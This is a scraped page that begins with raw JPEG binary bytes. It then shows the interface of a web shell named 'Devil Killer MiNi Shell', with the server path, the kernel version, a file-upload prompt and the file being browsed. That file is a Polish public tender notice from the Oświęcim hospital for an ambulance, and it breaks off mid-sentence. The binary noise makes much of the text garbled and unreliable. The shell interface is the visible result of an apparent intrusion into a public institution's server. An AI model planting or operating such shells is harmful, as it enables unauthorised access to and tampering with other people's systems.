JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230727/0032739201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA AMBULANSU WRAZ Z WYPOSAŻENIEM </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ OPIEKI ZDROWOTNEJ W OŚWIĘCIMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304409</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">WYSOKIE BRZEGI 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpitaloswiecim.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.szpitaloswiecim.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA AMBULANSU WRAZ Z WYPOSAŻENIEM </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aad1b244-2b88-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00327392</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.szpitaloswiecim.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Zakupowej Marke tplanet OnePlace na portalu https://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy użyciu platformy, opisane zostały w Instrukcji dla wykonawcy pod adresem: ttps://szpitaloswiecim.ezamawiajacy.pl/servlet/HomeServlet w zakładce: Regulacje i procedury procesu zakupoweg/Deklaracja dostępności.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>portalu Marketplanet OnePlace, określone w Instrukcji dla wykonawcy oraz zobowiązuje się korzystając z portalu Marketplanet<br/>OnePlace przestrzegać postanowień tej instrukcji.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia<br/>i wycofania oferty oraz komunikacji wynosi: 2000 MB.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: zamowienia@szpitaloswiecim.pl.<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Platformy Zakupowej Marketplanet OnePlace lub za pomocą poczty elektronicznej, na adres email: zamowienia@szpitaloswiecim.pl.<br/>Szczególne wymagania określone w Dziale XV SWZ obowiązują w przypadku składania ofert.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), zwanym dalej:<br/>rozporządzenie ws. środków komunikacji elektronicznej</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej RODO,<br/>informuję, iż:<br/>1. Administratorem jest ZOZ w Oświęcimiu, ul. Wysokie Brzegi 4, 32-600 Oświęcim<br/>2. Dane kontaktowe Inspektor Ochrony Danych:<br/>W ZOZ w Oświęcimiu, ul. Wysokie Brzegi 4, 32-600 Oświęcim został wyznaczony Inspektor Ochrony<br/>Danych, dane kontaktowe: tel. 33 8448 487, adres email: iod@szpitaloswiecim.pl;<br/>3. Cele przetwarzania danych osobowych:<br/>Dane osobowe są zbierane w celu niezbędnym dla udostępniania dokumentacji dotyczącej<br/>prowadzenia postępowań o udzielenie zamówień publicznych, w związku z postępowaniem o<br/>udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa, numer/<br/>prowadzonym w trybie podstawowym, na podstawie art. 275 pkt 1 ustawy Pzp;<br/>4. Podstawa prawna przetwarzania danych osobowych:<br/>Przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze<br/>(podstawa prawna z art. 6 ust. 1 lit. c RODO)<br/>Przetwarzanie danych osobowych dotyczących wyroków skazujących i naruszeń prawa (podstawa<br/>prawna z art. 10 RODO)<br/>Ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych oraz wydane na jej podstawie akty<br/>wykonawcze.<br/>5. Informacje o odbiorcach danych osobowych: Odbiorcami Pani/Pana danych osobowych są osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo być<br/>podmioty, z którymi administrator zawarł umowy lub porozumienie na korzystanie z udostępnianych przez nie systemów<br/>informatycznych, przy czym zakres przekazanych danych tym<br/>odbiorcom ograniczony jest do możliwości zapoznania się z tymi danymi w związku ze świadczeniem<br/>usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania<br/>poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/>6. Okres, przez który dane osobowe będą przechowywane:<br/>Dane osobowe są przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>7. Uprawnienia z art. 15-21 RODO:<br/>Przysługują Pani/Panu następujące uprawnienia:<br/>− prawo dostępu do swoich danych osobowych oraz otrzymania ich kopii;<br/>− prawo do sprostowania swoich danych osobowych ;<br/>− prawo żądania od administratora ograniczenia przetwarzania danych osobowych, z wyjątkiem<br/>sytuacji określonych w przepisach prawa;<br/>8. Prawo do wniesienia skargi:<br/>Ma Pan/Pani prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, iż przetwarzanie Pani/Pana danych osobowych przez Administratora narusza przepisy<br/>RODO. 9. Obowiązek podania danych<br/>Podanie danych osobowych jest wymogiem ustawowym. Konsekwencje niepodania określonych 10.<br/>Informacje o zautomatyzowanym podejmowaniu decyzji Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany, w tym w oparciu o profilowanie.<br/>11. Informacja o ograniczeniach w realizacji praw określonych w art. 15, 16 i 18 rozporządzenia<br/>2016/679<br/>Pełne informacje dotyczące RODO opisane zostały w dziale XXII SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOZ.DZP.271.34.TP.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 539430,89 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: DOSTAWA AMBULANSU WRAZ Z WYPOSAŻENIEM zgodnie z zapisami zawartymi w formularzu cenowym wraz z Arkuszem Informacji Technicznej AIT - Załącznik nr 2 do SWZ.<br/>•	Przedmiot zamówienia musi być fabrycznie nowy, wykonany zgodnie z PN-EN 1789 oraz wymaganymi warunkami samochodu bazowego, zabudowy medycznej i wyposażenia w sprzęt. Pojazd musi posiadać niezbędne wyposażenie oraz dokumenty dopuszczające do ruchu drogowego w Polsce. Pojazd musi posiadać świadectwo homologacji pojazdów skompletowanych i bazowych.<br/>•	Wykonawca udzieli gwarancji na cały przedmiot zamówienia: na samochód bez limitu kilometrów (min 24 miesięcy), na zabudowę medyczną wraz z bezpłatnymi przeglądami w siedzibie Zamawiającego (min 24 m-ce), na lakier (min 36 miesięcy), perforacja (min.36 miesięcy) oraz wyposażenie uzupełniające - na okres nie krótszy niż 24 miesięcy.<br/>•	Wykonawca zobowiązany jest do przeprowadzenia bezpłatnego szkolenia personelu Zamawiającego w zakresie obsługi przedmiotu zamówienia.<br/>•	Wynagrodzenie za przedmiot zamówienia musi obejmować również wszelkie koszty związane z dostawą ambulansu do siedziby Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114121-3 - Karetki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33100000-1 - Urządzenia medyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wskazany poniżej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VI SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej: O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy:<br/>Zamawiający stwierdzi, iż Wykonawca spełnił warunek udziału w postępowaniu jeśli wykaże że<br/>•	w okresie ostatnich trzech lat 3 lat licząc wstecz od upływu terminu składania ofert zrealizował co najmniej dwie dostawy ambulansu wraz z wyposażeniem o wartości co najmniej 450 000,00 zł każda.<br/>•	jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował lub realizuje dostawę ambulansu wraz z wyposażeniem o wartości co najmniej 450 000,00 zł każda. <br/>Powyższe oświadczenie należy złożyć wraz z ofertą- załącznik nr 4 do SWZ.<br/><br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia<br/>Zamawiający dokona oceny spełnienia przez Wykonawców wyżej wymienionych warunków na podstawie danych i informacji zawartych w oświadczeniu załączonym do oferty, zgodnie z wzorem – Załącznik nr 4 do SWZ oraz w przypadku Wykonawcy, którego oferta zostanie najwyżej oceniona na podstawie dokumentów złożonych na wezwanie Zamawiającego potwierdzających powyższe oświadczenie tj. dostarczy odpowiednie umowy potwierdzone za zgodność z oryginałem lub odpowiednie referencje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenia    i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, uprawnień oraz sytuacji ekonomicznej:<br/>- wykaz dostaw wykonanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz dokumenty potwierdzające, że dostawy wskazane w wykazie (wzór- załącznik nr 4a do SWZ) zostały wykonane należycie i terminowo.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a)	Sprawozdanie z badań: Dotyczy: Inny niezależny od silnika system ogrzewania przedziału medycznego z możliwością ustawienia temperatury i termostatem. Rozwiązanie przebadane na zgodność z normą PN-EN 1789 w oferowanym typie ambulansu – zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. VII ppkt.7 - Należy złożyć wraz z ofertą<br/>b)	Sprawozdanie z badań: Dotyczy: System sterowania oraz panele sterujące przebadane medycznym z R10 EKG ONZ w oferowanym typie ambulansu w oferowanym typie ambulansu – zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. X ppkt.8 - Należy złożyć wraz z ofertą<br/>c)	Sprawozdanie z badań: Dotyczy: System sterowania oraz panele sterujące w przedziale kierowcy przebadane na zg. z R10 EKG ONZ w oferowanym typie ambulansu w oferowanym typie ambulansu - zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. X ppkt.9 - Należy złożyć wraz z ofertą<br/>d)	Sprawozdanie z badań: Dotyczy: Fotele oraz system zamontowania przebadane na zg. z normą PN-EN 1789 w oferowanym typie ambulansu - zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. XII ppkt.1 – Należy złożyć wraz z ofertą - nie podlega uzupełnieniu - Parametr punktowany<br/>e)	Certyfikat potwierdzający posiadanie znaku CE, bądź Deklaracja Zgodności CE lub inne dokumenty <br/>równoważne – Należy złożyć wraz z ofertą<br/>f)	Krzesło kardiologiczne - Załączyć folder i deklarację zgodności z normą PN EN 1865-4 - Należy złożyć wraz z ofertą<br/>g)	Nosze elektryczne: Nosze zgodne z aktualnymi normami ambulansowymi PN EN 1789, PN EN 1865-2 - Wymagany certyfikaty wystawione przez niezależną jednostkę notyfikowaną, deklaracja zgodność - 4 - Należy złożyć wraz z ofertą <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Sprawozdanie z badań: Dotyczy: Inny niezależny od silnika system ogrzewania przedziału medycznego z możliwością ustawienia temperatury i termostatem. Rozwiązanie przebadane na zgodność z normą PN-EN 1789 w oferowanym typie ambulansu – zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. VII ppkt.7 <br/><br/>b)	Sprawozdanie z badań: Dotyczy: System sterowania oraz panele sterujące przebadane medycznym z R10 EKG ONZ w oferowanym typie ambulansu w oferowanym typie ambulansu – zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. X ppkt.8 <br/><br/>c)	Sprawozdanie z badań: Dotyczy: System sterowania oraz panele sterujące w przedziale kierowcy przebadane na zg. z R10 EKG ONZ w oferowanym typie ambulansu w oferowanym typie ambulansu - zgodnie z zał. nr 2 do SWZ (AIT Ambulans pkt. X ppkt.9 <br/><br/>e)	Certyfikat potwierdzający posiadanie znaku CE, bądź Deklaracja Zgodności CE lub inne dokumenty równoważne <br/><br/>f)	Krzesło kardiologiczne - Załączyć folder i deklarację zgodności z normą PN EN 1865-4<br/><br/>g)	Nosze elektryczne: Nosze zgodne z aktualnymi normami ambulansowymi PN EN 1789, PN EN 1865-2 - Wymagany certyfikaty wystawione przez niezależną jednostkę notyfikowaną, deklaracja zgodność <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> XXVIII Wymagania dotyczące wadium.<br/>1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 8 000,00 PLN.<br/>2.	Wadium musi być wniesione przed upływem terminu składania ofert oraz obejmować pełen okres związania ofertą tj. do dnia 04.08.2023 r.<br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego prowadzony w BGŻ BNP PARIBAS nr: 90 1600 1462 1870 5791 6000 0004 z wpisem na dowodzie wpłaty: DOSTAWA AMBULANSU WRAZ Z WYPOSAŻENIEM ZOZ.DZP.271.34.TP.2023.<br/>5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 pkt 2–4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia z gwarancji powinno wynikać, że dotyczy ona wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienia.<br/>8.	W pozostałych przypadkach wymagane jest dołączenie do oferty oryginału dokumentu<br/>wystawionego na rzecz Zamawiającego.<br/>9.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancję (poręczenie) należy przekazać w postaci elektronicznej, w oryginale, podpisane kwalifikowanym podpisem elektronicznym. Wykonawca powinien przekazać dokument wadium poprzez dołączenie do oferty. Z treści gwarancji winno wynikać 